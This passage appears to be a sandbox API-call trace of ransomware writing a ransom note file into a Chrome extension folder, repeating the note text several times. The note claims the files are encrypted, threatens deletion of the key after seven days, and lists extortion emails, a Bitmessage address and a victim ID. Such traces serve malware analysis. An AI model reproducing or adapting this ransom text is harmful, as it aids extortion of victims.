R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nù^=«\x16O\x1fïж>\x9bXË\x7fEóO¸Ù\x0c0\x9a\x03\x1f", lpUsedDefaultChar=0x0) returned 8717 [0281.662] WriteFile (in: hFile=0x2c8, lpBuffer=0x245c778*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x245c778*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0281.663] CloseHandle (hObject=0x2c8) returned 1 [0281.663] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\#readme_eman#.rtf")) returned 0xffffffff [0281.663] GetLastError () returned 0x2 [0281.663] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0281.663] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0281.664] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0281.664] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x245c778, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will 